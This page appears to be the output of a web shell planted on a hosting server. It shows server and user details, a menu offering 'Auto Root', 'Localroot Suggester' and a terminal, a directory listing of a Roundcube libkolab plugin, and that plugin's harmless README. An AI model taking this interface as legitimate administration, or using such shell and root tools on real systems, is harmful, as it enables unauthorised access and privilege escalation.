Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
webuzo-data /
roundcube /
plugins /
libkolab /
Delete
Unzip
Name
Size
Permission
Date
Action
SQL
[ DIR ]
drwxr-xr-x
2026-02-18 06:10
bin
[ DIR ]
drwxr-xr-x
2026-02-18 06:10
lib
[ DIR ]
drwxr-xr-x
2026-02-18 06:10
localization
[ DIR ]
drwxr-xr-x
2026-02-18 06:10
skins
[ DIR ]
drwxr-xr-x
2026-02-18 06:10
tests
[ DIR ]
drwxr-xr-x
2026-02-18 06:10
LICENSE
33.71
KB
-rwxr--r--
2021-06-17 11:51
README
1.18
KB
-rwxr--r--
2021-06-17 11:51
UPGRADING
308
B
-rwxr--r--
2021-06-17 11:51
composer.json
878
B
-rwxr--r--
2021-06-17 11:51
config.inc.php.dist
3.84
KB
-rwxr--r--
2021-06-17 11:51
libkolab.js
25.21
KB
-rwxr--r--
2021-06-17 11:51
libkolab.php
13.7
KB
-rwxr--r--
2021-06-17 11:51
Save
Rename
libkolab plugin to access to Kolab groupware data ================================================= The contained library classes establish a connection to the Kolab server and manage the access to the Kolab groupware objects stored in various IMAP folders. For reading and writing these objects, the PHP bindings of the libkolabxml library are used. This plugin also provides Elastic/Larry skin support for Kolab plugins. REQUIREMENTS ------------ * libkolabxml PHP bindings - kolabformat.so loaded into PHP - kolabformat.php placed somewhere in the include_path * PEAR: HTTP/Request2 * PEAR: Net/URL2 INSTALLATION ------------ To use local cache you need to create a dedicated table in Roundcube's database. To do so, execute the SQL commands in SQL/<yourdatabase>.initial.sql CONFIGURATION ------------- Rename config.inc.php.dist to config.inc.php in the plugin folder. For available configuration options see config.inc.php.dist file. IMPORTANT --------- This plugin doesn't work with the Classic skin of Roundcube because no templates are available for that skin. Use Roundcube `skins_allowed` option to limit skins available to the user or remove incompatible skins from the skins folder.